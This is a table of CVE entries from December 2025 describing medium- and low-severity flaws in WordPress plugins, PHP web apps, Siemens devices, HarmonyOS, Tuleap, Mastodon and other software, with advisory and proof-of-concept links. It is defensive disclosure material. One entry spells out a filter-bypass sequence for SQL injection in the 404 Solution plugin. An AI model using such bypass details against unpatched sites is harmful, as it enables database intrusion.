| aaron13100--404 Solution | The 404 Solution plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This is due to improper sanitization of the `filterText` parameter in the `ajaxUpdatePaginationLinks` AJAX action. The sanitization logic can be bypassed by using the sequence `*$/` which becomes `*/` after the `$` character is removed, allowing attackers to escape SQL comment contexts. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind SQL injection technique. | 2025-12-13 | 4.9 | CVE-2025-14477 | https://www.wordfence.com/threat-intel/vulnerabilities/id/389bee79-b59f-484a-86df-f041d6b00051?source=cve https://plugins.trac.wordpress.org/browser/404-solution/tags/2.36.10/includes/DataAccess.php#L977 https://plugins.trac.wordpress.org/browser/404-solution/tags/2.36.10/includes/DataAccess.php#L987 https://plugins.trac.wordpress.org/browser/404-solution/tags/2.36.10/includes/PluginLogic.php#L1595 https://plugins.trac.wordpress.org/browser/404-solution/tags/2.36.10/includes/sql/getRedirectsForView.sql#L106 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417333%40404-solution&new=3417333%40404-solution&sfp_email=&sfph_mail= |
| baowzh--hfly | A security vulnerability has been detected in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. The affected element is an unknown function of the file /admin/index.php/datafile/download. Such manipulation of the argument filename leads to path traversal. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 4.3 | CVE-2025-14521 | VDB-335859 | baowzh hfly download path traversal VDB-335859 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702949 | GitHub hfly 1.0 Arbitrary file reading https://github.com/Xor-Gerke/webray.com.cn/blob/main/cve/PHP-based%20travel%20website-CMS/PHP-based%20travel%20website-CMS%20download%20filename%20Arbitrary%20file%20reading.md |
| SourceCodester--Real Estate Property Listing App | A vulnerability has been found in SourceCodester Real Estate Property Listing App 1.0. The impacted element is an unknown function of the file /admin/property.php. Such manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-11 | 4.7 | CVE-2025-14530 | VDB-335871 | SourceCodester Real Estate Property Listing App property.php unrestricted upload VDB-335871 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703238 | SourceCodester Real Estate Property Listing App Using PHP and MySQL with Source Code 1 Unrestricted Upload https://github.com/zzdzz7/cve/issues/2 https://www.sourcecodester.com/ |
| code-projects--Rental Management System | A vulnerability was found in code-projects Rental Management System 2.0. This affects an unknown function of the file Transaction.java of the component Log Handler. Performing manipulation results in crlf injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2025-12-11 | 4.3 | CVE-2025-14531 | VDB-335872 | code-projects Rental Management System Log Transaction.java crlf injection VDB-335872 | CTI Indicators (IOB, IOC, IOA) Submit #703239 | code-projects rental-management-system 2.0 CRLF Injection https://github.com/asd1238525/cve/blob/main/CRLF.md https://code-projects.org/ |
| userback--Userback | The Userback plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the userback_get_json function in all versions up to, and including, 1.0.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract plugin's configuration data including the Userback API access token and site's posts/pages contents, including those that have private and draft status. | 2025-12-13 | 4.3 | CVE-2025-14540 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1add8693-20df-431e-ad3b-b23322f1fa03?source=cve https://plugins.trac.wordpress.org/browser/userback/tags/1.0.15/index.php#L148 |
| campcodes--Online Student Enrollment System | A vulnerability was detected in campcodes Online Student Enrollment System 1.0. This affects an unknown function of the file /admin/index.php?page=user-profile. Performing manipulation of the argument userphoto results in unrestricted upload. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-12-12 | 4.7 | CVE-2025-14582 | VDB-336202 | campcodes Online Student Enrollment System index.php unrestricted upload VDB-336202 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705524 | campcodes Online Student Enrollment System V1.0 Unrestricted Upload https://github.com/CHENCHOUCHOU/vuln/issues/2 https://www.campcodes.com/ |
| code-projects--Computer Laboratory System | A flaw has been found in code-projects Computer Laboratory System 1.0. This issue affects some unknown processing of the file admin/admin_pic.php. This manipulation of the argument image causes unrestricted upload. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-12-14 | 4.7 | CVE-2025-14641 | VDB-336374 | code-projects Computer Laboratory System admin_pic.php unrestricted upload VDB-336374 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707865 | code-projects.org Computer Laboratory System In PHP With Source Code 1.0 Unrestricted Upload https://github.com/Yohane-Mashiro/cve/blob/main/upload%203.md https://code-projects.org/ |
| code-projects--Computer Laboratory System | A vulnerability has been found in code-projects Computer Laboratory System 1.0. Impacted is an unknown function of the file technical_staff_pic.php. Such manipulation of the argument image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-14 | 4.7 | CVE-2025-14642 | VDB-336375 | code-projects Computer Laboratory System technical_staff_pic.php unrestricted upload VDB-336375 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707866 | code-projects.org Computer Laboratory System In PHP With Source Code 1.0 Incomplete Identification of Uploaded File Variables https://github.com/Yohane-Mashiro/cve/blob/main/upload%204.md https://code-projects.org/ |
| n/a--DedeBIZ | A security vulnerability has been detected in DedeBIZ up to 6.5.9. Affected by this vulnerability is an unknown functionality of the file /src/admin/catalog_add.php. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-14 | 4.7 | CVE-2025-14648 | VDB-336381 | DedeBIZ catalog_add.php command injection VDB-336381 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710164 | DedeBIZ 6.5.9 Code Injection https://github.com/HOrange147/CVE/blob/main/DedeBIZ%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C.pdf |
| Mayan--EDMS | A vulnerability was detected in Mayan EDMS up to 4.10.1. The affected element is an unknown function of the file /authentication/. The manipulation results in cross site scripting. The attack may be performed from remote. The exploit is now public and may be used. Upgrading to version 4.10.2 is sufficient to fix this issue. You should upgrade the affected component. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete." | 2025-12-14 | 4.3 | CVE-2025-14691 | VDB-336409 | Mayan EDMS authentication cross site scripting VDB-336409 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711713 | Mayan EDMS CMS 4.10 Cross Site Scripting https://github.com/ionutluca888/Mayan-EDMS-XSS-POC https://docs.mayan-edms.com/chapters/releases/4.10.2.html https://docs.mayan-edms.com/chapters/releases/4.10.2.html#security |
| Mayan--EDMS | A flaw has been found in Mayan EDMS up to 4.10.1. The impacted element is an unknown function of the file /authentication/. This manipulation causes open redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. Upgrading to version 4.10.2 is sufficient to resolve this issue. The affected component should be upgraded. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete." | 2025-12-14 | 4.3 | CVE-2025-14692 | VDB-336410 | Mayan EDMS authentication redirect VDB-336410 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711729 | Mayan EDMS CMS 4.10 Open Redirect https://github.com/ionutluca888/Mayan-EDMS-OpenRedirect-POC/tree/main https://docs.mayan-edms.com/chapters/releases/4.10.2.html https://docs.mayan-edms.com/chapters/releases/4.10.2.html#security |
| IBM--Controller | IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 are vulnerable to creation of temporary files without atomic operations, which may expose sensitive information to an authenticated user due to race condition attacks. | 2025-12-08 | 4.3 | CVE-2025-33111 | https://www.ibm.com/support/pages/node/7253273 |
| IBM--IBM Planning Analytics Local | IBM Planning Analytics Local 2.1.0 - 2.1.15 could disclose sensitive information about server architecture that could aid in further attacks against the system. | 2025-12-09 | 4.3 | CVE-2025-36437 | https://www.ibm.com/support/pages/node/7253603 |
| Siemens--SINEMA Remote Connect Server | A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V3.2 SP4). Affected applications do not properly validate license restrictions against the database, allowing direct modification of the system_ticketinfo table to bypass license limitations without proper enforcement checks. This could allow an attacker with database access to circumvent licensing restrictions by directly modifying database values, potentially enabling unauthorized use beyond the permitted scope. | 2025-12-09 | 4.3 | CVE-2025-40819 | https://cert-portal.siemens.com/productcert/html/ssa-626856.html |
| Siemens--RUGGEDCOM RMC8388 V5.X | A vulnerability has been identified in RUGGEDCOM RMC8388 V5.X (All versions < V5.10.1), RUGGEDCOM RS416Pv2 V5.X (All versions < V5.10.1), RUGGEDCOM RS416v2 V5.X (All versions < V5.10.1), RUGGEDCOM RS900 (32M) V5.X (All versions < V5.10.1), RUGGEDCOM RS900G (32M) V5.X (All versions < V5.10.1), RUGGEDCOM RSG2100 (32M) V5.X (All versions < V5.10.1), RUGGEDCOM RSG2100P (32M) V5.X (All versions < V5.10.1), RUGGEDCOM RSG2288 V5.X (All versions < V5.10.1), RUGGEDCOM RSG2300 V5.X (All versions < V5.10.1), RUGGEDCOM RSG2300P V5.X (All versions < V5.10.1), RUGGEDCOM RSG2488 V5.X (All versions < V5.10.1), RUGGEDCOM RSG907R (All versions < V5.10.1), RUGGEDCOM RSG908C (All versions < V5.10.1), RUGGEDCOM RSG909R (All versions < V5.10.1), RUGGEDCOM RSG910C (All versions < V5.10.1), RUGGEDCOM RSG920P V5.X (All versions < V5.10.1), RUGGEDCOM RSL910 (All versions < V5.10.1), RUGGEDCOM RST2228 (All versions < V5.10.1), RUGGEDCOM RST2228P (All versions < V5.10.1), RUGGEDCOM RST916C (All versions < V5.10.1), RUGGEDCOM RST916P (All versions < V5.10.1). Affected devices do not properly validate input during the TLS certificate upload process of the web service. This could allow an authenticated remote attacker to trigger a device crash and reboot, leading to a temporary Denial of Service on the device. | 2025-12-09 | 4.3 | CVE-2025-40935 | https://cert-portal.siemens.com/productcert/html/ssa-763474.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected device contains a USB port which allows unauthenticated connections. This could allow an attacker with physical access to the device to trigger reboot that could cause denial of service condition. | 2025-12-09 | 4.6 | CVE-2025-40939 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application exhibits inconsistent SNMP behavior, such as unexpected service availability and unreliable configuration handling across protocol versions. This could allow an attacker to access sensitive data, potentially leading to a breach of confidentiality. | 2025-12-09 | 4.9 | CVE-2025-40940 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected device exposes server information in its responses. This could allow an attacker with network access to gain useful information, increasing the likelihood of targeted attacks. | 2025-12-09 | 4.3 | CVE-2025-40941 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| Phoenix Contact--FL SWITCH 2005 | A low privileged remote attacker can use the SSH feature to execute commands directly after login. The process stays open and uses resources, which leads to reduced performance of the management functions. Switching functionality is not affected. | 2025-12-09 | 4.3 | CVE-2025-41693 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An attacker can use an undocumented UART port on the PCB as a side-channel with the user hardcoded credentials obtained from CVE-2025-41692 to gain read access to parts of the filesystem of the device. | 2025-12-09 | 4.6 | CVE-2025-41696 | https://certvde.com/de/advisories/VDE-2025-071 |
| TeamViewer--DEX | A vulnerability in TeamViewer DEX Client (formerly 1E Client) - Content Distribution Service (NomadBranch.exe) prior to version 25.11 for Windows allows malicious actors to coerce the service into transmitting data to an arbitrary internal IP address, potentially leaking sensitive information. | 2025-12-11 | 4.3 | CVE-2025-46266 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1005/ |
| Huawei--HarmonyOS | Permission control vulnerability in the media library module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-12-08 | 4.4 | CVE-2025-58279 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Fortinet--FortiWeb | A use of password hash instead of password for authentication vulnerability [CWE-836] in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an unauthenticated attacker to use the hash in place of the password to authenticate via crafted HTTP/HTTPS requests. | 2025-12-09 | 4.4 | CVE-2025-64471 | https://fortiguard.fortinet.com/psirt/FG-IR-25-984 |
| Enalean--tuleap | Tuleap is an Open Source Suite for management of software development and collaboration. Tuleap Community Edition versions below 17.0.99.1762444754 and Tuleap Enterprise Edition versions prior to 17.0-2, 16.13-7 and 16.12-10 allow attackers to trick victims into changing tracker general settings. This issue is fixed in Tuleap Community Edition version 17.0.99.1762444754 and Tuleap Enterprise Edition versions 17.0-2, 16.13-7 and 16.12-10. | 2025-12-08 | 4.6 | CVE-2025-64498 | https://github.com/Enalean/tuleap/security/advisories/GHSA-vxfh-h8p6-p5rg https://github.com/Enalean/tuleap/commit/993316dd6a291bb3937cb7a4571eaab0e7d55370 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=993316dd6a291bb3937cb7a4571eaab0e7d55370 https://tuleap.net/plugins/tracker/?aid=45593 |
| Enalean--tuleap | Tuleap is a free and open source suite for management of software development and collaboration. Tuleap Community Edition versions prior to 17.0.99.1762456922 and Tuleap Enterprise Edition versions prior to 17.0-2, 16.13-7 and 16.12-10 are vulnerable to CSRF attacks through the planning management API. Attackers have access to create, edit or remove plans. This issue is fixed in Tuleap Community Edition version 17.0.99.1762456922 and Tuleap Enterprise Edition versions 17.0-2, 16.13-7 and 16.12-10. | 2025-12-08 | 4.6 | CVE-2025-64499 | https://github.com/Enalean/tuleap/security/advisories/GHSA-9h47-jg7r-ww7x https://github.com/Enalean/tuleap/commit/1734a7bb2964042310ddc3f6dd7b4c82eee27526 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=1734a7bb2964042310ddc3f6dd7b4c82eee27526 https://tuleap.net/plugins/tracker/?aid=45592 |
| Enalean--tuleap | Tuleap is a free and open source suite for management of software development and collaboration. Versions of Tuleap Community Edition prior to 17.0.99.1763126988 and Tuleap Enterprise Edition prior to 17.0-3 and 16.13-8 have missing CSRF protections which allow attackers to create or remove tracker triggers. This issue is fixed in Tuleap Community Edition version 17.0.99.1763126988 and Tuleap Enterprise Edition versions 17.0-3 and 16.13-8. | 2025-12-08 | 4.6 | CVE-2025-64760 | https://github.com/Enalean/tuleap/security/advisories/GHSA-f2xv-x3g6-4j9p https://github.com/Enalean/tuleap/commit/71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4 https://tuleap.net/plugins/tracker/?aid=45618 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 4.8 | CVE-2025-64872 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Insufficiently Protected Credentials vulnerability that could result in limited unauthorized write access. An attacker could leverage this vulnerability to gain unauthorized access by exploiting improperly stored or transmitted credentials. Exploitation of this issue does not require user interaction. | 2025-12-09 | 4.3 | CVE-2025-64898 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Enalean--tuleap | Tuleap is a free and open source suite for management of software development and collaboration. Versions of Tuleap Community Edition prior to 17.0.99.1763803709 and Tuleap Enterprise Edition versions prior to 17.0-4 and 16.13-9 are missing CSRF protections in their tracker field dependencies, allowing attackers to modify tracker fields. This issue is fixed in Tuleap Community Edition version 17.0.99.1763803709 and Tuleap Enterprise Edition versions 17.0-4 and 16.13-9. | 2025-12-08 | 4.6 | CVE-2025-65962 | https://github.com/Enalean/tuleap/security/advisories/GHSA-9hgc-cm68-rrgc https://github.com/Enalean/tuleap/commit/26678c5b411042e68964b199bf88a44607550633 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=26678c5b411042e68964b199bf88a44607550633 https://tuleap.net/plugins/tracker/?aid=45632 |
| Huawei--HarmonyOS | Permission control vulnerability in the window management module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 4 | CVE-2025-66329 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | App lock verification bypass vulnerability in the file management app. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-12-08 | 4.9 | CVE-2025-66330 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| umbraco--Umbraco-CMS | Umbraco is an ASP.NET CMS. Due to unsafe handling and deletion of temporary files in versions 10.0.0 through 13.12.0, during the dictionary upload process an attacker with access to the backoffice can trigger predictable requests to temporary file paths. The application's error responses (HTTP 500 when a file exists, 404 when it does not) allow the attacker to enumerate the existence of arbitrary files on the server's filesystem. This vulnerability does not allow reading or writing file contents. In certain configurations, incomplete clean-up of temporary upload files may additionally expose the NTLM hash of the Windows account running the Umbraco application. This issue is fixed in version 13.12.1. | 2025-12-09 | 4.9 | CVE-2025-66625 | https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-hfv2-pf68-m33x https://github.com/umbraco/Umbraco-CMS/commit/7505efd433189037f46547932d4a8b603fd4a615 |
| LabRedesCefetRJ--WeGIA | WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Versions 3.5.4 and below contain a Stored Cross-Site Scripting (XSS) vulnerability in the /WeGIA/html/geral/configurar_senhas.php endpoint. The application does not sanitize user-controlled data before rendering it inside the employee selection dropdown. The application retrieves employee names from the database and injects them directly into HTML `<option>` elements without proper escaping. This issue is fixed in version 3.5.5. | 2025-12-09 | 4.3 | CVE-2025-67496 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9843-qm67-73h2 https://github.com/LabRedesCefetRJ/WeGIA/commit/c80b8cacd310fd459df61c030fb267c5e68cafc7 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.5.5 |
| CISA--Software Acquisition Guide Tool | The CISA Software Acquisition Guide Supplier Response Web Tool before 2025-12-11 was vulnerable to cross-site scripting via text fields. If an attacker could convince a user to import a specially-crafted JSON file, the Tool would load JavaScript from the file into the page. The JavaScript would execute in the context of the user's browser when the user submits the page (clicks 'Next'). | 2025-12-12 | 4.4 | CVE-2025-67634 | |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11, stored XSS was possible via a session attribute. | 2025-12-11 | 4.8 | CVE-2025-67741 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| SpaceX--Starlink Dish | SpaceX Starlink Dish devices with firmware 2024.12.04.mr46620 (e.g., on Mini1_prod2) allow administrative actions via unauthenticated LAN gRPC requests, aka MARMALADE 2. The cross-origin policy can be bypassed by omitting a Referer header. In some cases, an attacker's ability to read tilt, rotation, and elevation data via gRPC can make it easier to infer the geographical location of the dish. | 2025-12-11 | 4.2 | CVE-2025-67780 | https://www.akawlabs.com/blog/starlink-grpc-execution |
| MJML--MJML | MJML through 4.18.0 allows mj-include directory traversal to test file existence and (in the type="css" case) read files. NOTE: this issue exists because of an incomplete fix for CVE-2020-12827. | 2025-12-14 | 4.5 | CVE-2025-67898 | https://github.com/mjmlio/mjml/issues/3018 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| emrevona--WP Fastest Cache | The WP Fastest Cache plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.7.4 via the 'get_server_time_ajax_request' AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-12 | 3.5 | CVE-2025-10583 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b9e64c54-a78f-454a-a9ee-02f64b6ae83d?source=cve https://research.cleantalk.org/2025-10583 https://www.wpfastestcache.com/changelog/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.6 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to leak sensitive information from specifically crafted merge request titles. | 2025-12-11 | 3.5 | CVE-2025-12734 | GitLab Issue #579573 HackerOne Bug Bounty Report #3379381 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| TAC Information Services Internal and External Trade Inc.--GoldenHorn | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TAC Information Services Internal and External Trade Inc. GoldenHorn allows Cross-Site Scripting (XSS). This issue affects GoldenHorn: before 4.25.1121.1. | 2025-12-10 | 3.5 | CVE-2025-13127 | https://www.usom.gov.tr/bildirim/tr-25-0441 |
| SourceCodester--Online Banking System | A vulnerability was detected in SourceCodester Online Banking System 1.0. This impacts an unknown function of the file /?page=user. The manipulation of the argument First Name/Last Name results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used. | 2025-12-08 | 3.5 | CVE-2025-14221 | VDB-334663 | SourceCodester Online Banking System page cross site scripting VDB-334663 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701624 | SourceCodester Online Banking System July 14, 2021 - 17:13 Cross Site Scripting https://mega.nz/file/T4hjCagS#87U1JgRHZWzXW2HTpBIG-H9dJ_w9kUERmaaQqJyB5_Q https://www.sourcecodester.com/ |
| Yealink--SIP-T21P E2 | A weakness has been identified in Yealink SIP-T21P E2 52.84.0.15. Impacted is an unknown function of the component Local Directory Page. This manipulation causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-08 | 3.5 | CVE-2025-14228 | VDB-334670 | Yealink SIP-T21P E2 Local Directory cross site scripting VDB-334670 | CTI Indicators (IOB, IOC, TTP) Submit #701949 | Yealink T21P_2E 52.84.0.15 Cross Site Scripting https://drive.google.com/file/d/1vptRtEeoS1AZgnqow1yPrsgsBkw4jXc2/view?usp=sharing |
| baowzh--hfly | A security flaw has been discovered in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. This issue affects some unknown processing of the file /admin/index.php/advtext/add of the component advtext Module. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be exploited. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 3.5 | CVE-2025-14519 | VDB-335857 | baowzh hfly advtext add cross site scripting VDB-335857 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702943 | GitHub hfly 1.0 Stored Cross-Site Scripting https://github.com/Xor-Gerke/webray.com.cn/blob/main/cve/PHP-based%20travel%20website-CMS/PHP-based%20travel%20website-CMS%20advtext%20add%20Stored%20Cross-Site%20Scripting(XSS).md |
| yangshare--warehouseManager | A security vulnerability has been detected in yangshare warehouseManager 仓库管理系统 1.1.0. This affects the function addCustomer of the file CustomerManageHandler.java. Such manipulation of the argument Name leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-11 | 3.5 | CVE-2025-14538 | VDB-335877 | yangshare warehouseManager 仓库管理系统 CustomerManageHandler.java addCustomer cross site scripting VDB-335877 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703736 | gitee WarehouseManager v1.1.0 - Remove CAPTCHA Improper Neutralization of Alternate XSS Syntax https://gitee.com/yangshare/warehouseManager/issues/ID9NAU |
| n/a--Qualitor | A security vulnerability has been detected in Qualitor up to 8.24.73. The impacted element is an unknown function of the file /Qualitor/html/bc/bcdocumento9/biblioteca/request/viewDocumento.php. Such manipulation of the argument cdscript leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. It is suggested to upgrade the affected component. The vendor confirms the existence of the issue: "We became aware of the issue through an earlier direct notification from the original reporter, and our engineering team promptly investigated and implemented the necessary corrective measures. (...) Updated versions containing the fix have already been provided to our customer base". | 2025-12-12 | 3.5 | CVE-2025-14580 | VDB-336201 | Qualitor viewDocumento.php cross site scripting VDB-336201 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705193 | Qualitor 8.20.77 - 8.24.73 Cross Site Scripting |
| Tenda--AX9 | A security flaw has been discovered in Tenda AX9 22.03.01.46. This affects the function image_check of the component httpd. The manipulation results in use of weak hash. It is possible to launch the attack remotely. A high complexity level is associated with this attack. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be exploited. | 2025-12-13 | 3.7 | CVE-2025-14636 | VDB-336361 | Tenda AX9 httpd image_check weak hash VDB-336361 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707213 | Tenda AX9 V22.03.01.46 CWE-327 Use of a Broken or Risky Cryptographic Algorithm https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Tenda/AX9_Inte.md https://www.tenda.com.cn/ |
| MartialBE--one-hub | A vulnerability has been found in MartialBE one-hub up to 0.14.27. This vulnerability affects unknown code of the file docker-compose.yml. The manipulation of the argument SESSION_SECRET leads to use of a hard-coded cryptographic key. The attack may be initiated remotely. The complexity of an attack is rather high. It is stated that the exploitability is difficult. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. The code maintainer recommends (translated from Chinese): "The default docker-compose example file is not recommended for production use. If you intend to use it in production, please carefully check and modify every configuration and environment variable yourself!" | 2025-12-14 | 3.7 | CVE-2025-14651 | VDB-336384 | MartialBE one-hub docker-compose.yml hard-coded key VDB-336384 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710249 | https://github.com/MartialBE https://github.com/MartialBE/one-hub ≤ v0.14.27 Authentication Bypass by Primary Weakness https://github.com/MartialBE/one-hub/issues/872 https://github.com/MartialBE/one-hub/issues/872#issuecomment-3616033169 https://github.com/MartialBE/one-hub/blob/main/docker-compose.yml#L15C24-L15C38 |
| Siemens--SINEMA Remote Connect Server | A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V3.2 SP4). Affected applications contain private SSL/TLS keys on the server that are not properly protected allowing any user with server access to read these keys. This could allow an authenticated attacker to impersonate the server potentially enabling man-in-the-middle, traffic decryption or unauthorized access to services that trust these certificates. | 2025-12-09 | 3.3 | CVE-2025-40818 | https://cert-portal.siemens.com/productcert/html/ssa-626856.html |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Improper Verification of Cryptographic Signature vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to gain limited unauthorized write access. Exploitation of this issue does not require user interaction. | 2025-12-09 | 3.3 | CVE-2025-64786 | https://helpx.adobe.com/security/products/acrobat/apsb25-119.html |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Improper Verification of Cryptographic Signature vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass cryptographic protections and gain limited unauthorized write access. Exploitation of this issue does not require user interaction. | 2025-12-09 | 3.3 | CVE-2025-64787 | https://helpx.adobe.com/security/products/acrobat/apsb25-119.html |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 3.3 | CVE-2025-66331 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 3.3 | CVE-2025-66332 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 3.3 | CVE-2025-66333 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 3.3 | CVE-2025-66334 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Versions 4.2.27 and prior, 4.3.0-beta.1 through 4.3.14, 4.4.0-beta.1 through 4.4.9, 4.5.0-beta.1 through 4.5.2 have discrepancies in error handling which allow checking whether a given status exists by sending a request with a non-English Accept-Language header. Using this behavior, an attacker who knows the identifier of a particular status they are not allowed to see can confirm whether this status exists or not. This cannot be used to learn the contents of the status or any other property besides its existence. This issue is fixed in versions 4.2.28, 4.3.15, 4.4.10 and 4.5.3. | 2025-12-09 | 3.7 | CVE-2025-67500 | https://github.com/mastodon/mastodon/security/advisories/GHSA-gwhw-gcjx-72v8 https://github.com/mastodon/mastodon/pull/37077/commits/9957d3218cb33fea6a44bb285e2ba4795a059e4f |
